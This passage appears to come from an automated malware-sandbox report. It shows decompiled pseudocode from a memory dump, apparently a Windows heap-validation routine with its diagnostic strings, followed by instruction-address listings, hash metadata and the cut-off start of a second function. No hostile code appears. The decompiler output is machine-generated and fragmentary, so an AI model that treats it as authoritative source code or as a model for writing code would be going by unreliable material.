				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E00BCB150();
						} else {
							E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E00BCB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E00C7FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E00BCB150();
						} else {
							E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E00BCB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E00BCB150();
								} else {
									E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E00BCB150();
									} else {
										E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E00BCB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E00C7FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E00BCB150();
										} else {
											E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E00C1D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E00BCB150();
								} else {
									E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E00C8A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E00BEE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E00C8A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E00BEE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E00BEA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E00BEA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E00BEBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E00C723E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E00BC1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                                        0x00c84af7
                                                                                        0x00c84afb
                                                                                        0x00c84afd
                                                                                        0x00c84b01
                                                                                        0x00c84b03
                                                                                        0x00c84b08
                                                                                        0x00c84b0a
                                                                                        0x00c84b0f
                                                                                        0x00c84eb5
                                                                                        0x00c84eb5
                                                                                        0x00c84ebb
                                                                                        0x00c850d5
                                                                                        0x00c850d8
                                                                                        0x00c84ff6
                                                                                        0x00000000
                                                                                        0x00c84ff6
                                                                                        0x00c850de
                                                                                        0x00c850e4
                                                                                        0x00c850e8
                                                                                        0x00c85107
                                                                                        0x00c8510c
                                                                                        0x00c850ea
                                                                                        0x00c850ff
                                                                                        0x00c85104
                                                                                        0x00c85112
                                                                                        0x00c85115
                                                                                        0x00c85118
                                                                                        0x00c85119
                                                                                        0x00c850cb
                                                                                        0x00c850cb
                                                                                        0x00c850af
                                                                                        0x00000000
                                                                                        0x00c850af
                                                                                        0x00c84ecb
                                                                                        0x00c850b6
                                                                                        0x00c850bb
                                                                                        0x00c84ed1
                                                                                        0x00c84ee6
                                                                                        0x00c84eeb
                                                                                        0x00c850c1
                                                                                        0x00c850c2
                                                                                        0x00c850c5
                                                                                        0x00c850c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84b15
                                                                                        0x00c84b15
                                                                                        0x00c84b1c
                                                                                        0x00c84b1e
                                                                                        0x00c84b23
                                                                                        0x00c84b27
                                                                                        0x00c84b33
                                                                                        0x00c84b38
                                                                                        0x00c84b3a
                                                                                        0x00c84b3c
                                                                                        0x00c84b41
                                                                                        0x00c84b41
                                                                                        0x00c84b3a
                                                                                        0x00c84b52
                                                                                        0x00c85045
                                                                                        0x00c8504b
                                                                                        0x00c8504f
                                                                                        0x00c8506e
                                                                                        0x00c85073
                                                                                        0x00c85051
                                                                                        0x00c85066
                                                                                        0x00c8506b
                                                                                        0x00c85083
                                                                                        0x00c85088
                                                                                        0x00c85088
                                                                                        0x00c8508a
                                                                                        0x00c85091
                                                                                        0x00c85099
                                                                                        0x00c85099
                                                                                        0x00c8509d
                                                                                        0x00c850a7
                                                                                        0x00c850ad
                                                                                        0x00c850ad
                                                                                        0x00c850ad
                                                                                        0x00000000
                                                                                        0x00c8509d
                                                                                        0x00c84b58
                                                                                        0x00c84b5b
                                                                                        0x00c84b5e
                                                                                        0x00c84b63
                                                                                        0x00c84b66
                                                                                        0x00c84b69
                                                                                        0x00c84b6f
                                                                                        0x00c84be4
                                                                                        0x00c84bf0
                                                                                        0x00c84bf2
                                                                                        0x00c84bf5
                                                                                        0x00c84dc3
                                                                                        0x00c84dc6
                                                                                        0x00c84dc9
                                                                                        0x00c84dce
                                                                                        0x00c84dce
                                                                                        0x00c84dd0
                                                                                        0x00c84dd0
                                                                                        0x00c84dd5
                                                                                        0x00c84def
                                                                                        0x00c84dd7
                                                                                        0x00c84de7
                                                                                        0x00c84de7
                                                                                        0x00c84df3
                                                                                        0x00c85001
                                                                                        0x00c85007
                                                                                        0x00c8500b
                                                                                        0x00c8502a
                                                                                        0x00c8502f
                                                                                        0x00c8500d
                                                                                        0x00c85022
                                                                                        0x00c85027
                                                                                        0x00c85039
                                                                                        0x00c8503a
                                                                                        0x00c8503b
                                                                                        0x00000000
                                                                                        0x00c84df9
                                                                                        0x00c84dfd
                                                                                        0x00c84e90
                                                                                        0x00c84e94
                                                                                        0x00c84e9e
                                                                                        0x00c84ea4
                                                                                        0x00c84ea4
                                                                                        0x00c84ea4
                                                                                        0x00c84ea6
                                                                                        0x00c84ea6
                                                                                        0x00000000
                                                                                        0x00c84ea6
                                                                                        0x00c84e03
                                                                                        0x00c84e08
                                                                                        0x00c84f88
                                                                                        0x00c84f92
                                                                                        0x00c84f99
                                                                                        0x00c84f9c
                                                                                        0x00c84fe0
                                                                                        0x00c84fe4
                                                                                        0x00c84fee
                                                                                        0x00c84ff4
                                                                                        0x00c84ff4
                                                                                        0x00c84ff4
                                                                                        0x00000000
                                                                                        0x00c84fe4
                                                                                        0x00c84f9e
                                                                                        0x00c84fa4
                                                                                        0x00c84fa8
                                                                                        0x00c84fc7
                                                                                        0x00c84fcc
                                                                                        0x00c84faa
                                                                                        0x00c84fbf
                                                                                        0x00c84fc4
                                                                                        0x00c84fd2
                                                                                        0x00c84fd5
                                                                                        0x00c84fd6
                                                                                        0x00c84f34
                                                                                        0x00c84f34
                                                                                        0x00000000
                                                                                        0x00c84f39
                                                                                        0x00c84e0e
                                                                                        0x00c84e14
                                                                                        0x00c84e1b
                                                                                        0x00c84e25
                                                                                        0x00c84e2b
                                                                                        0x00c84e2b
                                                                                        0x00c84e33
                                                                                        0x00c84e38
                                                                                        0x00c84e8a
                                                                                        0x00c84e8a
                                                                                        0x00000000
                                                                                        0x00c84e3a
                                                                                        0x00c84e3e
                                                                                        0x00c84e43
                                                                                        0x00c84e47
                                                                                        0x00c84e53
                                                                                        0x00c84e58
                                                                                        0x00c84e5a
                                                                                        0x00c84e5c
                                                                                        0x00c84e61
                                                                                        0x00c84e61
                                                                                        0x00c84e5a
                                                                                        0x00c84e6e
                                                                                        0x00c84f41
                                                                                        0x00c84f47
                                                                                        0x00c84f4b
                                                                                        0x00c84f6a
                                                                                        0x00c84f6f
                                                                                        0x00c84f4d
                                                                                        0x00c84f62
                                                                                        0x00c84f67
                                                                                        0x00c84f7f
                                                                                        0x00c84f80
                                                                                        0x00c84f81
                                                                                        0x00000000
                                                                                        0x00c84e74
                                                                                        0x00c84e78
                                                                                        0x00c84e82
                                                                                        0x00c84e88
                                                                                        0x00c84e88
                                                                                        0x00000000
                                                                                        0x00c84e78
                                                                                        0x00c84e6e
                                                                                        0x00c84e38
                                                                                        0x00c84df3
                                                                                        0x00c84bfe
                                                                                        0x00c84c01
                                                                                        0x00c84c04
                                                                                        0x00c84c07
                                                                                        0x00c84c09
                                                                                        0x00c84c0c
                                                                                        0x00c84c0e
                                                                                        0x00c84c0e
                                                                                        0x00c84c11
                                                                                        0x00c84c11
                                                                                        0x00c84c0c
                                                                                        0x00c84c14
                                                                                        0x00c84c17
                                                                                        0x00c84dae
                                                                                        0x00c84db2
                                                                                        0x00c84db7
                                                                                        0x00c84dba
                                                                                        0x00c84dbd
                                                                                        0x00c84ef1
                                                                                        0x00c84ef7
                                                                                        0x00c84efb
                                                                                        0x00c84f1a
                                                                                        0x00c84f1f
                                                                                        0x00c84efd
                                                                                        0x00c84f12
                                                                                        0x00c84f17
                                                                                        0x00c84f2b
                                                                                        0x00c84f2b
                                                                                        0x00c84f2d
                                                                                        0x00c84f2e
                                                                                        0x00c84f2f
                                                                                        0x00000000
                                                                                        0x00c84f2f
                                                                                        0x00000000
                                                                                        0x00c84c1d
                                                                                        0x00c84c1d
                                                                                        0x00c84c20
                                                                                        0x00c84c23
                                                                                        0x00c84c26
                                                                                        0x00c84c29
                                                                                        0x00c84c2c
                                                                                        0x00c84c2e
                                                                                        0x00c84d91
                                                                                        0x00c84d91
                                                                                        0x00c84d92
                                                                                        0x00c84d97
                                                                                        0x00c84d9e
                                                                                        0x00000000
                                                                                        0x00c84d9e
                                                                                        0x00c84c34
                                                                                        0x00c84c37
                                                                                        0x00c84c39
                                                                                        0x00c84c3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84c45
                                                                                        0x00c84c48
                                                                                        0x00c84c4e
                                                                                        0x00c84c50
                                                                                        0x00c84c78
                                                                                        0x00c84c78
                                                                                        0x00c84c7b
                                                                                        0x00c84c7d
                                                                                        0x00c84c80
                                                                                        0x00c84c84
                                                                                        0x00c84cad
                                                                                        0x00c84cad
                                                                                        0x00c84cb0
                                                                                        0x00c84cb8
                                                                                        0x00c84cbb
                                                                                        0x00c84cbe
                                                                                        0x00c84cc1
                                                                                        0x00c84cc7
                                                                                        0x00c84cdc
                                                                                        0x00c84cc9
                                                                                        0x00c84cd2
                                                                                        0x00c84cd4
                                                                                        0x00c84cd4
                                                                                        0x00c84cde
                                                                                        0x00c84ce0
                                                                                        0x00c84d13
                                                                                        0x00c84d13
                                                                                        0x00c84d16
                                                                                        0x00c84d18
                                                                                        0x00c84d29
                                                                                        0x00c84d2a
                                                                                        0x00c84d2c
                                                                                        0x00c84d34
                                                                                        0x00c84d1a
                                                                                        0x00c84d1a
                                                                                        0x00c84d1a
                                                                                        0x00c84d1d
                                                                                        0x00c84d1f
                                                                                        0x00c84d22
                                                                                        0x00c84d24
                                                                                        0x00c84d24
                                                                                        0x00c84d3c
                                                                                        0x00c84d3f
                                                                                        0x00c84d45
                                                                                        0x00c84d47
                                                                                        0x00c84d6c
                                                                                        0x00c84d6c
                                                                                        0x00c84d70
                                                                                        0x00c84d7e
                                                                                        0x00c84d84
                                                                                        0x00c84d84
                                                                                        0x00000000
                                                                                        0x00c84d49
                                                                                        0x00c84d49
                                                                                        0x00c84d56
                                                                                        0x00c84d56
                                                                                        0x00c84d59
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84d4e
                                                                                        0x00c84d50
                                                                                        0x00c84d52
                                                                                        0x00c84d8e
                                                                                        0x00c84d5d
                                                                                        0x00c84d5f
                                                                                        0x00c84d67
                                                                                        0x00000000
                                                                                        0x00c84d67
                                                                                        0x00c84d54
                                                                                        0x00c84d54
                                                                                        0x00c84d5b
                                                                                        0x00000000
                                                                                        0x00c84d5b
                                                                                        0x00c84ce2
                                                                                        0x00c84ce2
                                                                                        0x00c84ce5
                                                                                        0x00c84ce5
                                                                                        0x00c84ce7
                                                                                        0x00c84cfb
                                                                                        0x00c84ce9
                                                                                        0x00c84ce9
                                                                                        0x00c84cec
                                                                                        0x00c84cef
                                                                                        0x00c84cf1
                                                                                        0x00c84cf3
                                                                                        0x00c84cf3
                                                                                        0x00c84cf3
                                                                                        0x00c84cf6
                                                                                        0x00c84cf6
                                                                                        0x00c84d02
                                                                                        0x00c84d05
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84d07
                                                                                        0x00c84d0f
                                                                                        0x00c84d11
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84d11
                                                                                        0x00000000
                                                                                        0x00c84ce5
                                                                                        0x00c84ce0
                                                                                        0x00c84c8a
                                                                                        0x00c84c8f
                                                                                        0x00c84c91
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84c9d
                                                                                        0x00000000
                                                                                        0x00c84c9d
                                                                                        0x00c84c52
                                                                                        0x00c84c5f
                                                                                        0x00c84c5f
                                                                                        0x00c84c62
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84c57
                                                                                        0x00c84c59
                                                                                        0x00c84c5b
                                                                                        0x00c84caa
                                                                                        0x00c84c66
                                                                                        0x00c84c68
                                                                                        0x00c84c70
                                                                                        0x00c84c75
                                                                                        0x00000000
                                                                                        0x00c84c75
                                                                                        0x00c84c5d
                                                                                        0x00c84c5d
                                                                                        0x00c84c64
                                                                                        0x00000000
                                                                                        0x00c84c64
                                                                                        0x00c84c17
                                                                                        0x00c84b75
                                                                                        0x00c84bc4
                                                                                        0x00c84bc8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84bd9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84b77
                                                                                        0x00c84b7a
                                                                                        0x00c84b8c
                                                                                        0x00c84b7c
                                                                                        0x00c84b7e
                                                                                        0x00c84b83
                                                                                        0x00c84b86
                                                                                        0x00c84b86
                                                                                        0x00c84b90
                                                                                        0x00c84b93
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84b95
                                                                                        0x00c84bab
                                                                                        0x00c84bb0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84bb2
                                                                                        0x00c84bb9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84bbb
                                                                                        0x00c84bbe
                                                                                        0x00c84bc1
                                                                                        0x00c84bc1
                                                                                        0x00000000
                                                                                        0x00c84bc1
                                                                                        0x00c84b97
                                                                                        0x00c84ba4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84ba6
                                                                                        0x00000000
                                                                                        0x00c84ba6
                                                                                        0x00c84ea9
                                                                                        0x00c84ea9
                                                                                        0x00c84eb2
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                        • API String ID: 0-3591852110
                                                                                        • Opcode ID: d16ab889098a8a863f904b66db05c3ddc23dce8d7fd1a70d2a115d4809f6022f
                                                                                        • Instruction ID: e244840f093474f5d63c1c128a4c673441a84c08bed0871b1564ebab78485e23
                                                                                        • Opcode Fuzzy Hash: d16ab889098a8a863f904b66db05c3ddc23dce8d7fd1a70d2a115d4809f6022f
                                                                                        • Instruction Fuzzy Hash: FB12EE70200642DFCB29EF69C495BBAB7E5FF09308F18849DE4968B681D774ED84CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C84496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 56%
                                                                                        			E00C84496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
